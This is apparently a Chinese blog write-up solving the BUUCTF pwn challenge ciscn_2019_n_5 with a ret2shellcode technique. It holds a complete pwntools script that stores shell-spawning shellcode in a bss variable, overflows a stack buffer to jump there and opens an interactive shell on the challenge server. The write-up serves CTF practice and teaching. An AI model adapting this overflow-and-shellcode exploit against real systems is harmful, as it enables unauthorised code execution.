BUUCTF-PWN-ciscn_2019_n_5

发表于2022-01-18|更新于2022-01-18|CTF

|阅读量:|评论数:

BUUCTF-PWN-ciscn_2019_n_5

checksec

IDA

name变量存在于bss段，可以先将shellcode存入name中，然后通过text溢出到name的位置，并执行shellcode

EXP

from pwn import *

p = remote('node4.buuoj.cn', 28183)
# p =  process('./ciscn_2019_n_5')

context(arch='amd64', os='linux')
context.log_level = 'debug'

shellcode = asm(shellcraft.sh())

p.sendlineafter('tell me your name\n', shellcode)

payload = flat(b'a' * (0x20 + 0x8) + p64(0x601080))
p.sendlineafter('What do you want to say to me?\n', payload)

p.interactive()

结果

文章作者: icvuln

文章链接: https://lht.wiki/20220118-ctf-ciscn_2019_n_5/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Clerk.Max(well);！

打赏

wechat
alipay

相关推荐

CTFHUB-PWN-ret2text

XCTF-PWN-反应釜开关控制

CTFHUB-PWN-ret2shellcode

XCTF-PWN-实时数据监测

BUUCTF-PWN-warmup_csaw_2016

评论

本地搜索